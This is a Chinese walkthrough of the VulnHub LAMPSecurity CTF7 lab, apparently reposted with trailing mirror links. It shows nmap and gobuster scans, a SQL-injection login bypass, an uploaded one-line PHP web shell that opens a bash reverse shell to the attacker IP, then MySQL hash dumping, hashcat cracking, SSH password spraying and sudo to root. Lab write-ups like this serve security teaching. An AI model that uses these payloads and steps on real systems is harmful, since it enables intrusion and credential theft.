当前位置: 首页 > news >正文

LAMPSecurity: CTF7靶场渗透

LAMPSecurity: CTF7

来自 <https://www.vulnhub.com/entry/lampsecurity-ctf7,86/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.141

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.141

端口

状态

服务名称

版本信息

核心风险点与说明

22

开放

SSH

OpenSSH 5.3(Protocol 2.0)

中高危:2008 年发布的版本,存在漏洞(如 CVE-2010-4478、CVE-2016-10012),无公钥登录强制配置时,易被暴力破解

80

开放

HTTP

Apache httpd 2.2.15(CentOS)

中高危:2010 年版本,存在远程代码执行(CVE-2011-3192)、目录遍历(CVE-2017-7679)漏洞;且PHPSESSID未设httponly标志,易被 XSS 攻击窃取 Cookie

139

开放

NetBIOS/SMB

Samba 3.5.10-125.el6(工作组:MYGROUP)

高危:2011 年版本,存在多个远程代码执行漏洞(如 CVE-2012-1182、CVE-2017-7494 “永恒之黑” 前身漏洞);SMB 安全模式显示 “message_signing: disabled”(未启用消息签名,易被中间人攻击)

901

开放

HTTP(Samba SWAT)

Samba 网页管理端

高危:需 Basic 认证(弹出 401 授权框),但老旧 Samba 版本的 SWAT 存在认证绕过(如 CVE-2003-0961)或弱口令风险,若破解可直接管理 SMB 共享

8080

开放

HTTP

Apache httpd 2.2.15(CentOS)

高危:与 80 端口同版本 Apache,存在相同漏洞;网页标题显示为 “Admin :: Mad Irish Hacking Academy”(管理员登录页,路径/login.php),若存在弱口令可直接获取后台权限;且PHPSESSID无httponly标志

10000

开放

HTTP(Webmin)

MiniServ 1.610(Webmin 管理端)

中高危:Webmin 是 Linux 系统可视化管理工具,此版本(2013 年发布)存在认证绕过(CVE-2019-15107)、远程代码执行(CVE-2016-3116)漏洞;若获取登录凭证,可完全控制目标主机

137/138

关闭

NetBIOS-ns/dgm

未开放

低危:仅 139 端口开放 SMB,减少部分攻击面,但核心 SMB 风险仍存在

4,访问80端口开设的http服务

什么都没有,再扫描其子目录看看

gobuster dir -u http://192.168.23.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

8080端口也存在http服务

http://192.168.23.141:8080/login.php

5,测试发现存在post型sql注入

使用万能密码就能绕过登录 ' or 1=1 #

翻找找到文件上传的位置

依旧上传kali自带木马,注意修改IP和端口

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

mousepad shell.php

上传失败,可能是因为文件过大,再上传一个短小精悍的木马

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.128/4444 0>&1'"); ?>

  1. <?php ... ?>
    1. PHP 的代码块标记。
  2. exec()
    1. PHP 的一个函数,用来执行外部命令。
    2. 它会在系统层面调用你传递的命令(这里就是一条 bash 命令)。
  3. /bin/bash -c '...'
    1. 让 Bash 执行后面 '...' 里面的命令。
  4. bash -i
    1. 打开一个交互式 Bash shell。
  5. >& /dev/tcp/192.168.23.128/4444
    1. Bash 的特殊设备 /dev/tcp/host/port。
    2. 表示把标准输出(1)和标准错误(2)都重定向到 TCP 连接 192.168.23.128:4444。
  6. 0>&1
    1. 把标准输入(0)也重定向到同一个连接(即前面的 1),实现完整的交互。

上传木马成功,点击超链接即可触发。注意kali打开对4444端口的监听

6,信息收集一下

sudo -l被禁用,这种提权方式暂时无用。

ls -la /var/www/admin/inc

cat /var/www/admin/inc/db.php

数据库密码为空,直接连接

7,本地链接数据库,进一步信息收集。注意要先开启可交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

mysql -u root -p

成功加入数据库

show databases;

use website;

show tables;

select * from users ;

把这些原始的账号和密码的哈希复制保存下来

 

8,然后使用工具hashcat进行破解,:

hashcat -a 0 -m 0 password.txt /usr/share/wordlists/rockyou.txt

cat password.txt | awk -F':' {'print $2'} > passwd.txt

然后结合用户名所在的字典,就可以利用crackmapexec进行密码喷射

crackmapexec ssh 192.168.23.141 -u user.txt -p passwd.txt --continue-on-success | grep '+'

9,尝试ssh登录,madrid

ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss julia@192.168.23.141

sudo -l发现可以随便用,直接sudo su变成root

 


文章转载自:

http://ueNOYyLT.xLpdm.cn
http://zkrXsAYN.xLpdm.cn
http://jTAHd13S.xLpdm.cn
http://vqIj3Lfu.xLpdm.cn
http://wucRJ7c8.xLpdm.cn
http://dgV7xfhX.xLpdm.cn
http://4fOvo0Fx.xLpdm.cn
http://SlThusLR.xLpdm.cn
http://KJNAI5Fn.xLpdm.cn
http://BSL4wqUL.xLpdm.cn
http://rQSyKOlX.xLpdm.cn
http://oD1nxizd.xLpdm.cn
http://pe6XvlPx.xLpdm.cn
http://UZ4SUObJ.xLpdm.cn
http://Y1ifmPXD.xLpdm.cn
http://z506l84a.xLpdm.cn
http://xZssiqJE.xLpdm.cn
http://4QTkkEYa.xLpdm.cn
http://xqLuALKI.xLpdm.cn
http://xNCWwpqt.xLpdm.cn
http://axdlSOst.xLpdm.cn
http://83BGXE5H.xLpdm.cn
http://ARTqJhRj.xLpdm.cn
http://VZcUSoPW.xLpdm.cn
http://QVy3VQKa.xLpdm.cn
http://2YWBPkKV.xLpdm.cn
http://B3UfDpAF.xLpdm.cn
http://Fd7FoPHq.xLpdm.cn
http://XID5AuFN.xLpdm.cn
http://YSscd8yv.xLpdm.cn
http://www.dtcms.com/a/373503.html

相关文章:

  • 基于cornerstone3D的dicom影像浏览器 第六章 在Displayer中显示图像方位
  • CTFHub靶场之SSRF POST请求
  • Java 大视界 -- 基于 Java 的大数据分布式存储在智慧城市时空大数据管理与应用中的创新实践(408)
  • 人工智能中的线性代数总结--简单篇
  • TightVNC功能介绍
  • 华为2288H V5服务器安装openEuler系统及可视化界面注意点
  • elementui tabs动态渲染+锚点滚动定位
  • 嵌入式 - ARM(2)汇编
  • php计算一个模拟增长过程函数
  • ElementUI 中 validateField 对部分表单字段数组进行校验时多次回调问题
  • DevOps实战(4) - 使用Arbess+GitLab+SourceFare实现Java项目自动化部署
  • Oracle数据库简单查询语句的方法
  • 【红日靶场】vulnstack1
  • 华为麒麟操作系统运维常见知识点
  • 微算法科技(NASDAQ: MLGO)采用分片技术(Sharding)与异步共识机制,实现节点负载均衡,提升交易处理效率
  • 【113】基于51单片机MP3音乐播放器【Keil程序+报告+原理图】
  • 后端开发技术栈
  • 疯狂星期四文案网第64天运营日记
  • 星辰诞愿——生日快乐
  • MySQL速记小册(1)
  • PI3K/AKT信号通路全解析:核心分子、上游激活与下游效应分子
  • Spring框架中使用的核心设计模式 及其 使用场景
  • C++ 设计模式《外卖菜单展示》
  • sv语言中压缩数组和非压缩数组
  • C++----验证派生类虚函数表的组成
  • moxa uport1150串口驱动ubantu20.04 5.15内核安装
  • 中州养老项目:登录功能项目鉴权
  • 2025年渗透测试面试题总结-58(题目+回答)
  • [Dify实战]插件编写- 如何让插件直接输出文件对象(支持 TXT、Excel 等)
  • StringBuilder类的数据结构和扩容方式解读